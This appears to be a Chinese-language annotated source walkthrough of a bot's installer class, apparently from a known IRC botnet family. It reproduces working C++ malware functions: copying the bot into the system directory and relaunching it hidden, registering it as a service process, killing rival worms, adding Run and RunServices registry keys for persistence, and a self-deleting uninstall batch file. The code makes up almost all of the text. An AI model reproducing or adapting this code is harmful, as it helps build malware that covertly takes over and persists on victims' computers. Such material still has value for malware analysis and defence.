十二、2008年3月19日
作者:青青子衿
email:anzijin@sina.com
1、 bool CInstaller :: CopyToSysDir ( CString & sFilename ) 函数
//
//函数功能:保证系统中只有一个bot在运行,将bot拷贝到系统文件夹中, 把拷贝到系统中的bot运行起来
//参数: CString &sFilename bot的文件名
//返回值: 调用成功返回true,否则返回false
//
/
bool CInstaller :: CopyToSysDir ( CString & sFilename )
{
char tstr [ MAX_PATH ];
#ifdef WIN32
CString sysdir ;
GetSystemDirectory ( sysdir . GetBuffer ( MAX_PATH ), MAX_PATH ); //获得系统文件目录
m_sSysDir . Assign ( sysdir . CStr ()); //将该目录添加到该类的唯一的一个成员变量中
CString cfilename ;
GetModuleFileName ( GetModuleHandle ( NULL ), cfilename . GetBuffer ( MAX_PATH ), MAX_PATH ); //获得当前模块的所在文件的文件名
HINSTANCE kernel32_dll = LoadLibrary ( "kernel32.dll" ); //加载kernel32.dll文件
if ( kernel32_dll ) //获得一下函数的位置
{
fRegisterServiceProcess =( RSP ) GetProcAddress ( kernel32_dll , "RegisterServiceProcess" );
fCreateToolhelp32Snapshot =( CT32S ) GetProcAddress ( kernel32_dll , "CreateToolhelp32Snapshot" );
fProcess32First =( P32F ) GetProcAddress ( kernel32_dll , "Process32First" );
fProcess32Next =( P32N ) GetProcAddress ( kernel32_dll , "Process32Next" );
if ( fRegisterServiceProcess )
{
fRegisterServiceProcess (0, 1); //把当前进程设置为服务
}
}
#else
//处理linux的情况
m_sSysDir . Assign ( "/usr/sbin" );
CString sysdir ( m_sSysDir );
CString cfilename ( g_cMainCtrl . m_sArgv0 );
#endif // WIN32
if (! g_cMainCtrl . m_cCmdLine . m_cConfig . bUpdate )
{
unsigned long lStartTime = GetTickCount ();
bool bFound = true ;
while (( GetTickCount ()- lStartTime ) < 60000 && bFound ) //判断超时
{
if ( GetCopies ( sFilename )<2) //获得拷贝的数目
{
//如果小于2设为返回false
bFound = false ;
}
Sleep (1000);
}
if ( bFound ) //如果拷贝数大于2 ,那么本进程结束
{
exit (1);
}
}
long lTimeoutStart ;
if (! cfilename . Find ( sFilename . CStr (), 0)) //如果参数的文件名,是进程文件名的子字符串,执行下面的操作
{
if ( g_cMainCtrl . m_cCmdLine . m_cConfig . bUpdate ) //如果bUpdate 为true,则杀掉进程sFilename
{
KillProcess ( sFilename . CStr ());
}
} //这里保证了系统中只有一个bot进程在运行。
#ifdef WIN32
// Kill MSBlast //杀死冲击波病毒
KillProcess ( "msblast.exe" );
KillProcess ( "penis32.exe" );
KillProcess ( "mspatch.exe" );
// Kill Sobig.F
KillProcess ( "winppr32.exe" ); //病毒的进程名
// Kill Welchia
KillProcess ( "dllhost.exe" ); //病毒的进程名
KillProcess ( "tftpd.exe" );
#else // FIXME: Add linux worm killer here
#endif // WIN32
if (! cfilename . Find ( sysdir , 0) || cfilename . Find ( "winhlpp32.exe" , 0)) //如果是在linux平台下用下面的条件语句,在windows平台下用本条件语句
#ifdef LINUX
if (! cfilename . Find ( sFilename , 0))
#endif {
sprintf ( tstr , "%s%c%s" , sysdir . CStr (), DIRCHAR , sFilename . CStr ()); //DIRCHAR 表示斜杠/
lTimeoutStart = GetTickCount (); //获得当前的时间
// FIXME::BAD!!!
#ifdef WIN32
while ( CopyFile ( cfilename , tstr , false )== false && //拷贝文件到系统目录,
GetTickCount ()- lTimeoutStart < 25000) //如果拷贝文件失败,并且尝试时间小于25秒,那么休息2秒钟后重试。
{
Sleep (2000);
}
#else
//处理linux平台,使用shell中的cp指令
char szCmdBuf [ MAX_PATH ];
sprintf ( szCmdBuf , "cp %s %s" , cfilename . CStr (), tstr );
system ( szCmdBuf );
#endif // WIN32
#ifndef _DEBUG
#ifdef WIN32
PROCESS_INFORMATION pinfo ;
STARTUPINFO sinfo ;
memset (& sinfo , 0, sizeof ( STARTUPINFO ));
sinfo . cb = sizeof ( sinfo );
sinfo . wShowWindow = SW_HIDE ;
if ( CreateProcess ( NULL , tstr , NULL , NULL , TRUE , NORMAL_PRIORITY_CLASS | DETACHED_PROCESS , NULL , NULL , & sinfo , & pinfo ))
{
//创建新的进程,运行拷贝到系统文件夹中的bot程序,本bot进程退出。
exit (0);
}
#else
//在linux平台下用shell完成
sprintf ( szCmdBuf , "%s 2>&1 > /dev/null 2>&1 &" , tstr );
system ( szCmdBuf ); exit (0);
#endif // WIN32
#endif // _DEBUG
}
return true ;
}
2、 bool CInstaller :: Install () 函数
//
//
//函数功能:安装类的构造函数,不做任何操作
//参数: 无
//返回值: bool ,永远是true
//
///
bool CInstaller :: Install ()
{
return true ;
}
3、 bool CInstaller :: Uninstall () 卸载函数
///
//
//函数功能:卸载函数,启动卸载批处理卸载bot
//参数: 无
//返回值: bool调用成功返回true,否则返回false
//
///
bool CInstaller :: Uninstall ()
{
#ifdef WIN32
HANDLE f ;
DWORD r ;
PROCESS_INFORMATION pinfo ;
STARTUPINFO sinfo ;
char cmdline [ MAX_PATH ];
char tcmdline [ MAX_PATH ];
char cfilename [ MAX_PATH ];
char batfile [ MAX_PATH ];
char tempdir [ MAX_PATH ];
GetModuleFileName ( GetModuleHandle ( NULL ), cfilename , sizeof ( cfilename )); //获取本进程的文件名
GetTempPath ( sizeof ( tempdir ), tempdir ); //获得系统临时文件路径
sprintf ( batfile , "%s//r.bat" , tempdir ); //构造删除bot批处理程序,的全路径文件名
f = CreateFile ( batfile , GENERIC_WRITE , 0, NULL , CREATE_ALWAYS , 0, 0); //创建批处理程序
if ( f > ( HANDLE )0) //如果文件创建成功
{
// write a batch file to remove our executable once we close
WriteFile ( f , "@echo off/r/n"
":start/r/nif not exist /"/"%1/"/" goto done/r/n"
"del /F /"/"%1/"/"/r/n"
"del /"/"%1/"/"/r/n"
"goto start/r/n"
":done/r/n"
"del /F %temp%/r.bat/r/n"
"del %temp%/r.bat/r/n" , 105, & r , NULL ); //写入批处理代码
CloseHandle ( f );
memset (& sinfo , 0, sizeof ( STARTUPINFO ));
sinfo . cb = sizeof ( sinfo );
sinfo . wShowWindow = SW_HIDE ;
GetModuleFileName ( GetModuleHandle ( NULL ), cfilename , sizeof ( cfilename )); // get our file name
sprintf ( tcmdline , "%%comspec%% /c %s %s" , batfile , cfilename ); // build command line 构造运行批处理程序的命令行
ExpandEnvironmentStrings ( tcmdline , cmdline , sizeof ( cmdline )); // put the name of the command interpreter into the command line//扩展环境变量,作用是加上批处理程序所在的路径
// execute the batch file
CreateProcess ( NULL , cmdline , NULL , NULL , TRUE , NORMAL_PRIORITY_CLASS | DETACHED_PROCESS , NULL , NULL , & sinfo , & pinfo );
}
#else // Linux
#endif // WIN32
return true ;
}
4、 bool CInstaller :: RegStartAdd ( CString & sValuename , CString & sFilename ) 函数
//
//函数功能:添加启动项
//参数: CString &sValuename 键值的名称
// CString &sFilename 启动的文件名
//返回值: bool 返回true
//
/
bool CInstaller :: RegStartAdd ( CString & sValuename , CString & sFilename )
{
HKEY key ;
RegCreateKeyEx ( HKEY_LOCAL_MACHINE , "Software//Microsoft//Windows//CurrentVersion//Run" , 0, NULL , REG_OPTION_NON_VOLATILE , KEY_ALL_ACCESS , NULL , & key , NULL );
RegSetValueEx ( key , sValuename , 0, REG_SZ , ( LPBYTE )( const char *) sFilename , ( DWORD ) strlen ( sFilename ));
RegCloseKey ( key );
RegCreateKeyEx ( HKEY_LOCAL_MACHINE , "Software//Microsoft//Windows//CurrentVersion//RunServices" , 0, NULL , REG_OPTION_NON_VOLATILE , KEY_ALL_ACCESS , NULL , & key , NULL );
RegSetValueEx ( key , sValuename , 0, REG_SZ , ( LPBYTE )( const char *) sFilename , ( DWORD ) strlen ( sFilename ));
RegCloseKey ( key );
return true ;
}
5、 bool CInstaller :: RegStartDel ( CString & sValuename ) 函数
//
//函数功能:启动项删除
//参数: CString &sValuename 启动项的键值名称
//返回值: bool 永远返回true
//
///
bool CInstaller :: RegStartDel ( CString & sValuename )
{
HKEY key ;
RegCreateKeyEx ( HKEY_LOCAL_MACHINE , "Software//Microsoft//Windows//CurrentVersion//Run" , 0, NULL , REG_OPTION_NON_VOLATILE , KEY_ALL_ACCESS , NULL , & key , NULL );
RegDeleteValue ( key , sValuename );
RegCloseKey ( key );
RegCreateKeyEx ( HKEY_LOCAL_MACHINE , "Software//Microsoft//Windows//CurrentVersion//RunServices" , 0, NULL , REG_OPTION_NON_VOLATILE , KEY_ALL_ACCESS , NULL , & key , NULL );
RegDeleteValue ( key , sValuename );
RegCloseKey ( key );
return true ;
}